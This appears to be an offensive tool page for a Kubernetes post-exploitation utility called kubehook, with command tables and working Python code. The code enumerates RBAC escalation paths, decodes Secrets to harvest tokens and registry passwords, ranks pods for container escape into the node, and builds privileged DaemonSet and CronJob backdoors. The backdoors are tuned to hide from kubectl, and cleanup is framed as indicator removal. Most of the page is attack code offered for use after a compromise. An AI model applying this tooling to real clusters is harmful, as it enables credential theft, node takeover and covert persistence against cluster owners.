k8s-postexploit
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
| Field | Value |
|---|---|
| name | k8s-postexploit |
| description | Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence |
| category | post-exploitation |
| tags | ["kubernetes","k8s","container","post-exploitation","rbac","escape","etcd","secrets","daemonset","cronjob"] |
| tech_stack | ["kubernetes","python","etcd"] |
| cwe_ids | ["CWE-269","CWE-522","CWE-693","CWE-250"] |
| chains_with | ["T1611","T1552.007","T1613","T1610","T1053.007"] |
| prerequisites | ["T1610","T1078"] |
| version | 1.0 |
Kubernetes post-exploitation targets cluster resources, RBAC misconfigurations, container security boundaries, and etcd for secret extraction. After compromising a pod or obtaining kubeconfig, these tools provide cluster enumeration, privilege escalation, container escape, and persistent access.
Install the Python dependencies (the `kubernetes` client and `etcd3`), then confirm you actually have API access before running anything:

```shell
pip3 install kubernetes etcd3

# Quick prerequisite check
kubectl cluster-info                                      # verify cluster access
kubectl auth can-i --list                                 # check current permissions
python3 -c "from kubernetes import client; print('OK')"   # client library importable
```
| Action | Command | Purpose |
|---|---|---|
| Full enumeration | kubehook k8s_enum | Map namespaces, pods, services, RBAC, ingress |
| Secret metadata | kubehook k8s_enum --namespace kube-system | Focus on high-value system namespace |
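The RBAC half of enumeration is deciding what the identity you hold can do and whether any of it leads to more privilege. The following is an added example written for this page, not kubehook's own code: it models `kubectl auth can-i --list` offline over ClusterRole/ClusterRoleBinding objects in the dict shape the API returns, then flags rules a practitioner would chase first. The roles, bindings and service account names are constructed for the example, and the escalation list is a short, assumed subset rather than an exhaustive one. In a real run the objects come from `RbacAuthorizationV1Api().list_cluster_role()` and `list_cluster_role_binding()`; namespaced Role/RoleBinding objects and aggregated ClusterRoles are left out for brevity.

```python
"""Offline model of `kubectl auth can-i --list`: derive a subject's effective
rules from ClusterRole/ClusterRoleBinding objects and flag escalation paths.
Example code for this page; objects below are constructed sample data."""

RBAC_GROUP = "rbac.authorization.k8s.io"

# (verb, resource, apiGroup, why it matters). Assumption: short, non-exhaustive list.
ESCALATION_CHECKS = [
    ("*", "*", "*", "wildcard rule: full control of every API resource"),
    ("create", "clusterrolebindings", RBAC_GROUP, "can bind any ClusterRole (e.g. cluster-admin) to itself"),
    ("bind", "clusterroles", RBAC_GROUP, "bind verb lets it grant roles it does not hold"),
    ("escalate", "clusterroles", RBAC_GROUP, "escalate verb lets it edit roles beyond its own rights"),
    ("impersonate", "users", "", "can act as any user, including cluster admins"),
    ("get", "secrets", "", "can read service account tokens and application secrets"),
    ("create", "pods", "", "can schedule privileged/hostPath pods for node escape"),
    ("create", "pods/exec", "", "can exec into running pods and steal their mounted tokens"),
]

# Constructed sample objects (hypothetical names) in API JSON/dict form.
CLUSTER_ROLES = [
    {"metadata": {"name": "cluster-admin"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"metadata": {"name": "secret-reader"},
     "rules": [{"apiGroups": [""], "resources": ["secrets"], "verbs": ["get", "list"]}]},
    {"metadata": {"name": "deployer"},
     "rules": [{"apiGroups": [""], "resources": ["pods", "pods/exec"], "verbs": ["create", "get"]},
               {"apiGroups": ["apps"], "resources": ["deployments"], "verbs": ["*"]}]},
]
CLUSTER_ROLE_BINDINGS = [
    {"metadata": {"name": "default-reads-secrets"},
     "roleRef": {"kind": "ClusterRole", "name": "secret-reader"},
     "subjects": [{"kind": "ServiceAccount", "name": "default", "namespace": "default"}]},
    {"metadata": {"name": "ci-deploys"},
     "roleRef": {"kind": "ClusterRole", "name": "deployer"},
     "subjects": [{"kind": "ServiceAccount", "name": "ci-runner", "namespace": "ci"}]},
    {"metadata": {"name": "masters"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "Group", "name": "system:masters"}]},
]


def _subject_matches(subject, kind, name, namespace):
    if subject.get("kind") != kind or subject.get("name") != name:
        return False
    # Only ServiceAccount subjects are namespaced; User/Group subjects are not.
    return kind != "ServiceAccount" or subject.get("namespace") == namespace


def effective_rules(kind, name, namespace=None,
                    roles=CLUSTER_ROLES, bindings=CLUSTER_ROLE_BINDINGS):
    """Union of PolicyRules from every ClusterRoleBinding that names the subject."""
    by_name = {r["metadata"]["name"]: r for r in roles}
    rules = []
    for binding in bindings:
        if any(_subject_matches(s, kind, name, namespace) for s in binding.get("subjects", [])):
            role = by_name.get(binding["roleRef"]["name"])
            if role is not None:
                rules.extend(role.get("rules", []))
    return rules


def can_i(rules, verb, resource, api_group=""):
    """True if any rule grants `verb` on `resource` in `api_group` ('*' wildcards honoured)."""
    for rule in rules:
        groups = rule.get("apiGroups", [])
        if "*" not in groups and api_group not in groups:
            continue
        verbs = rule.get("verbs", [])
        if "*" not in verbs and verb not in verbs:
            continue
        resources = rule.get("resources", [])
        if "*" in resources or resource in resources:
            return True
    return False


def escalation_findings(rules):
    """Reasons this rule set can be turned into more privilege, in check order."""
    return [why for verb, res, grp, why in ESCALATION_CHECKS if can_i(rules, verb, res, grp)]


if __name__ == "__main__":
    for kind, name, ns in [("ServiceAccount", "default", "default"),
                           ("ServiceAccount", "ci-runner", "ci"),
                           ("Group", "system:masters", None)]:
        rules = effective_rules(kind, name, ns)
        print(f"{kind} {ns or '-'}/{name}: {len(rules)} rule(s)")
        for why in escalation_findings(rules):
            print("  [!]", why)
```

The `ci-runner` account in the sample has no `secrets` access at all, yet `create pods` plus `create pods/exec` is enough to read every token mounted into pods it can reach, which is why those verbs sit on the escalation list next to the obvious RBAC ones.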
| Action | Command | Purpose |
|---|---|---|
| K8s Secrets | kubehook k8s_secrets | Extract and decode all Kubernetes Secrets |
| etcd dump | kubehook etcd_dump --endpoint ENDPOINT | Direct etcd access for all secrets |
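What "extract and decode" means in practice: Secret `data` values are base64, but the interesting ones need a second step (a JWT to read claims from, a `.dockerconfigjson` blob holding registry credentials, a TLS private key). The block below is an added example for this page, not kubehook's own code. It runs offline over a constructed `SecretList` (hypothetical names, namespaces, credentials and an unsigned dummy token) shaped like `kubectl get secrets -A -o json`, and shows both the legacy `kubernetes.io/serviceaccount/*` claims found in token Secrets and the bound-token `kubernetes.io` claim layout found in projected tokens under `/var/run/secrets/kubernetes.io/serviceaccount/token`. Tokens are decoded without signature verification on purpose: the goal is to learn which identity they carry, and the API server will verify them when they are used.

```python
"""Decode Kubernetes Secrets and pull identity out of service account tokens.
Example code for this page; SAMPLE_SECRETS is constructed data."""
import base64
import json


def b64url_decode(segment):
    """JWT segments are unpadded base64url; restore padding before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def jwt_claims(token):
    """Payload claims only. No signature check: we just want the identity."""
    _header, payload, _sig = token.split(".")
    return json.loads(b64url_decode(payload))


def decode_secret(secret):
    """API objects carry base64 `data`; manifests on disk may use plain `stringData`."""
    out = {k: base64.b64decode(v) for k, v in (secret.get("data") or {}).items()}
    out.update({k: v.encode() for k, v in (secret.get("stringData") or {}).items()})
    return out


def sa_identity(token):
    """(namespace, name) from legacy token-Secret claims or bound-token claims."""
    claims = jwt_claims(token)
    bound = (claims.get("kubernetes.io") or {}).get("serviceaccount")
    if bound:
        return claims["kubernetes.io"]["namespace"], bound["name"]
    return (claims["kubernetes.io/serviceaccount/namespace"],
            claims["kubernetes.io/serviceaccount/service-account.name"])


def harvest(secret_list):
    """One (namespace/name, kind, usable detail) tuple per secret, by Secret type."""
    findings = []
    for s in secret_list["items"]:
        meta, stype, data = s["metadata"], s.get("type", "Opaque"), decode_secret(s)
        where = f'{meta["namespace"]}/{meta["name"]}'
        if stype == "kubernetes.io/service-account-token":
            ns, name = sa_identity(data["token"].decode())
            findings.append((where, "sa-token", f"serviceaccount {ns}:{name}"))
        elif stype == "kubernetes.io/dockerconfigjson":
            cfg = json.loads(data[".dockerconfigjson"])
            for registry, auth in cfg["auths"].items():
                user, _, pw = base64.b64decode(auth["auth"]).decode().partition(":")
                findings.append((where, "registry", f"{registry} {user}:{pw}"))
        elif stype == "kubernetes.io/tls":
            findings.append((where, "tls-key", f'{len(data["tls.key"])} bytes of private key'))
        else:
            findings.append((where, stype, ", ".join(sorted(data))))
    return findings


# ---- constructed sample data (hypothetical names; dummy signature) ----
def _b64(text):
    return base64.b64encode(text.encode()).decode()


def _fake_jwt(claims):
    def seg(d):
        return base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b"=").decode()
    return f'{seg({"alg": "RS256", "kid": "sample"})}.{seg(claims)}.c2ln'


SAMPLE_SECRETS = {"items": [
    {"metadata": {"name": "admin-token-abc12", "namespace": "kube-system"},
     "type": "kubernetes.io/service-account-token",
     "data": {"namespace": _b64("kube-system"),
              "token": _b64(_fake_jwt({
                  "iss": "kubernetes/serviceaccount",
                  "kubernetes.io/serviceaccount/namespace": "kube-system",
                  "kubernetes.io/serviceaccount/service-account.name": "admin"}))}},
    {"metadata": {"name": "regcred", "namespace": "ci"},
     "type": "kubernetes.io/dockerconfigjson",
     "data": {".dockerconfigjson": _b64(json.dumps({"auths": {
         "registry.example.com": {"auth": _b64("deploy:hunter2")}}}))}},
    {"metadata": {"name": "db-creds", "namespace": "prod"}, "type": "Opaque",
     "data": {"username": _b64("app"), "password": _b64("s3cret")}},
    {"metadata": {"name": "ingress-tls", "namespace": "prod"}, "type": "kubernetes.io/tls",
     "data": {"tls.crt": _b64("-----BEGIN CERTIFICATE-----..."),
              "tls.key": _b64("-----BEGIN PRIVATE KEY-----...")}},
]}

if __name__ == "__main__":
    for where, kind, detail in harvest(SAMPLE_SECRETS):
        print(f"{where:32} {kind:10} {detail}")
```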
| Action | Command | Purpose |
|---|---|---|
| Container escape | kubehook k8s_escape | Detect escape vectors (privileged, hostPID, docker socket) |
| RBAC abuse | kubehook k8s_privesc --method bind_admin | Create ClusterRoleBinding for cluster-admin |
| SA token theft | kubehook k8s_privesc --method sa_token | Steal service account tokens from pods |
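The escape vectors the table names (privileged containers, `hostPID`, the Docker socket) are all visible in a pod spec before you ever exec into the pod, so the detection step can be run over everything the current identity is allowed to list. The block below is an added example written for this page, not kubehook's `k8s_escape`; it scores constructed pod objects (hypothetical names and images, real PodSpec field names) in the dict shape `CoreV1Api().list_pod_for_all_namespaces()` returns, and the host-path and capability lists are an assumed common subset, not an exhaustive one. It also flags the classic combination explicitly, since privileged plus `hostPID` is what makes `nsenter` into the node's PID 1 work.

```python
"""Rank pods by container-escape vectors judged from their specs alone.
Example code for this page; SAMPLE_PODS is constructed data."""

# Assumption: a common, non-exhaustive list of node-handover paths.
DANGEROUS_HOST_PATHS = {
    "/": "host root filesystem mounted: chroot into the node",
    "/var/run/docker.sock": "docker socket: start a privileged container on the host",
    "/run/containerd/containerd.sock": "containerd socket: run tasks in host namespaces",
    "/var/run/crio/crio.sock": "CRI-O socket: same as the containerd case",
    "/etc": "host /etc: write cron jobs, sudoers or passwd",
    "/root": "host /root: drop an SSH key",
    "/var/lib/kubelet": "kubelet state dir: every pod's volumes and tokens on the node",
}
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "DAC_READ_SEARCH",
                  "NET_ADMIN", "SYS_RAWIO"}


def _covers(mount, target):
    """True if a hostPath mount of `mount` exposes `target` (same path or a parent of it)."""
    return target == mount or target.startswith(mount.rstrip("/") + "/")


def escape_vectors(pod):
    """List the ways a shell in this pod could reach the node."""
    spec, vectors = pod["spec"], []
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            vectors.append(f"{flag}=true: shares the node's {flag[4:].lower()} namespace")
    for vol in spec.get("volumes") or []:
        mount = (vol.get("hostPath") or {}).get("path")
        if mount is None:
            continue
        if mount == "/":
            vectors.append(f"hostPath /: {DANGEROUS_HOST_PATHS['/']}")
            continue
        for target, why in DANGEROUS_HOST_PATHS.items():
            if target != "/" and _covers(mount, target):
                vectors.append(f"hostPath {mount}: {why}")
    for c in (spec.get("containers") or []) + (spec.get("initContainers") or []):
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            vectors.append(f"privileged container {c['name']}: all caps, host devices visible")
        caps = DANGEROUS_CAPS & set((sc.get("capabilities") or {}).get("add") or [])
        if caps:
            vectors.append(f"container {c['name']} adds {sorted(caps)}")
    # privileged + hostPID: `nsenter -t 1 -m -u -i -n -p` lands in the node's init process.
    if spec.get("hostPID") and any(v.startswith("privileged container") for v in vectors):
        vectors.append("privileged+hostPID: nsenter into PID 1 on the node")
    return vectors


def rank_pods(pods):
    """(namespace/name, vectors) pairs, most escape vectors first."""
    scored = [(f'{p["metadata"]["namespace"]}/{p["metadata"]["name"]}', escape_vectors(p))
              for p in pods]
    return sorted(scored, key=lambda t: -len(t[1]))


SAMPLE_PODS = [  # constructed; hypothetical names and images
    {"metadata": {"name": "web-7d9f", "namespace": "prod"},
     "spec": {"containers": [{"name": "web", "image": "registry.example.com/web:1",
                              "securityContext": {"runAsNonRoot": True}}]}},
    {"metadata": {"name": "node-exporter-x1", "namespace": "monitoring"},
     "spec": {"hostPID": True, "hostNetwork": True,
              "volumes": [{"name": "root", "hostPath": {"path": "/"}}],
              "containers": [{"name": "exporter", "image": "prom/node-exporter"}]}},
    {"metadata": {"name": "dind-runner", "namespace": "ci"},
     "spec": {"volumes": [{"name": "run", "hostPath": {"path": "/var/run"}}],
              "containers": [{"name": "dind", "image": "docker:dind",
                              "securityContext": {"privileged": True}}]}},
    {"metadata": {"name": "netdebug", "namespace": "default"},
     "spec": {"initContainers": [{"name": "sysctl", "image": "busybox",
                                  "securityContext": {"capabilities": {"add": ["SYS_ADMIN", "NET_ADMIN"]}}}],
              "containers": [{"name": "shell", "image": "busybox"}]}},
]

if __name__ == "__main__":
    for name, vectors in rank_pods(SAMPLE_PODS):
        print(f"{name}: {len(vectors)} vector(s)")
        for v in vectors:
            print("   -", v)
```

Note the `/var/run` mount on the `dind-runner` sample: it is flagged for the Docker socket even though the path itself is not on the list, because a parent-directory mount exposes everything beneath it.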
| Action | Command | Purpose |
|---|---|---|
| DaemonSet backdoor | kubehook k8s_backdoor --type daemonset --image IMAGE | Deploy on every node |
| CronJob backdoor | kubehook k8s_backdoor --type cronjob --image IMAGE | Periodic callback |
Remove everything the tool deployed, selected by its label:

```shell
kubehook cleanup_k8s
```
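The two persistence types and the cleanup step hang together through one label: every object the backdoor creates carries it, and cleanup is a label-selector delete. The block below is an added example for this page, not kubehook's own code. It builds the DaemonSet and CronJob manifests as plain dicts (what you would hand to `AppsV1Api().create_namespaced_daemon_set()` and `BatchV1Api().create_namespaced_cron_job()`), then implements the equality-based label-selector syntax (`k=v`, `k!=v`, `k`, `!k`) and runs it over a constructed inventory to pick out exactly the objects to delete. The label key `kubehook.io/managed`, the image, the object names and the namespace are assumptions made for the example.

```python
"""Build DaemonSet/CronJob persistence manifests tagged with one label and
select them again for cleanup with a label selector.
Example code for this page; SAMPLE_OBJECTS is constructed data."""

MARKER = {"kubehook.io/managed": "true"}  # assumed label the cleanup selector keys on


def _labels(name):
    return {"app": name, **MARKER}


def build_daemonset(image, name="node-agent", namespace="kube-system", command=None):
    """One privileged, hostPID pod per node; the blanket toleration makes the
    scheduler place it on tainted control-plane nodes as well."""
    return {
        "apiVersion": "apps/v1", "kind": "DaemonSet",
        "metadata": {"name": name, "namespace": namespace, "labels": _labels(name)},
        "spec": {
            "selector": {"matchLabels": {"app": name}},
            "template": {
                "metadata": {"labels": _labels(name)},
                "spec": {
                    "tolerations": [{"operator": "Exists"}],
                    "hostPID": True,
                    "containers": [{
                        "name": name, "image": image,
                        "command": command or ["/bin/sh", "-c", "sleep infinity"],
                        "securityContext": {"privileged": True}}]}}}}


def build_cronjob(image, schedule="*/10 * * * *", name="cache-refresh",
                  namespace="kube-system", command=None):
    """Periodic callback. History limits of 0 keep finished pods from piling up
    in `kubectl get pods`; the real payload goes in `command`."""
    return {
        "apiVersion": "batch/v1", "kind": "CronJob",
        "metadata": {"name": name, "namespace": namespace, "labels": _labels(name)},
        "spec": {
            "schedule": schedule, "concurrencyPolicy": "Forbid",
            "successfulJobsHistoryLimit": 0, "failedJobsHistoryLimit": 0,
            "jobTemplate": {"spec": {"template": {
                "metadata": {"labels": _labels(name)},
                "spec": {"restartPolicy": "Never",
                         "containers": [{"name": name, "image": image,
                                         "command": command or ["/bin/sh", "-c", "true"]}]}}}}}}


def parse_selector(selector):
    """Equality-based selector terms: `k=v`, `k==v`, `k!=v`, `k` (exists), `!k` (absent)."""
    terms = []
    for raw in selector.split(","):
        raw = raw.strip()
        if "!=" in raw:
            k, v = raw.split("!=", 1)
            terms.append(("ne", k, v))
        elif "==" in raw:
            k, v = raw.split("==", 1)
            terms.append(("eq", k, v))
        elif "=" in raw:
            k, v = raw.split("=", 1)
            terms.append(("eq", k, v))
        elif raw.startswith("!"):
            terms.append(("absent", raw[1:], None))
        else:
            terms.append(("present", raw, None))
    return terms


def matches(obj, terms):
    labels = (obj.get("metadata") or {}).get("labels") or {}
    for op, k, v in terms:
        if op == "eq" and labels.get(k) != v:
            return False
        if op == "ne" and labels.get(k) == v:
            return False
        if op == "present" and k not in labels:
            return False
        if op == "absent" and k in labels:
            return False
    return True


def select_for_cleanup(objects, selector="kubehook.io/managed=true"):
    """(kind, namespace, name) for every inventory object the selector matches."""
    terms = parse_selector(selector)
    return [(o["kind"], o["metadata"]["namespace"], o["metadata"]["name"])
            for o in objects if matches(o, terms)]


SAMPLE_OBJECTS = [  # constructed inventory; unrelated objects mixed in on purpose
    build_daemonset("registry.example.com/agent:1"),
    build_cronjob("registry.example.com/agent:1"),
    {"kind": "Deployment", "metadata": {"name": "web", "namespace": "prod", "labels": {"app": "web"}}},
    {"kind": "ConfigMap", "metadata": {"name": "kube-root-ca.crt", "namespace": "default"}},
]

if __name__ == "__main__":
    for kind, ns, name in select_for_cleanup(SAMPLE_OBJECTS):
        print(f"kubectl delete {kind.lower()}/{name} -n {ns}")
```

Selecting by a dedicated label rather than by name is what lets cleanup stay correct when the names are randomized per engagement, and the same selector is what a defender would use to find the objects, so choose the key accordingly.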
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| k8s_enum | Cluster resource enumeration | T1613 — Container and Resource Discovery |
| k8s_secrets | Kubernetes Secret extraction | T1552.007 — Container API |
| k8s_escape | Container escape exploitation | T1611 — Escape to Host |
| k8s_privesc | RBAC privilege escalation | T1078 — Valid Accounts |
| etcd_dump | Direct etcd data extraction | T1552.007 — Container API |
| k8s_backdoor | DaemonSet/CronJob persistence | T1053.007 — Container Orchestration Job |
| cleanup_k8s | Resource removal by label selector | T1070 — Indicator Removal |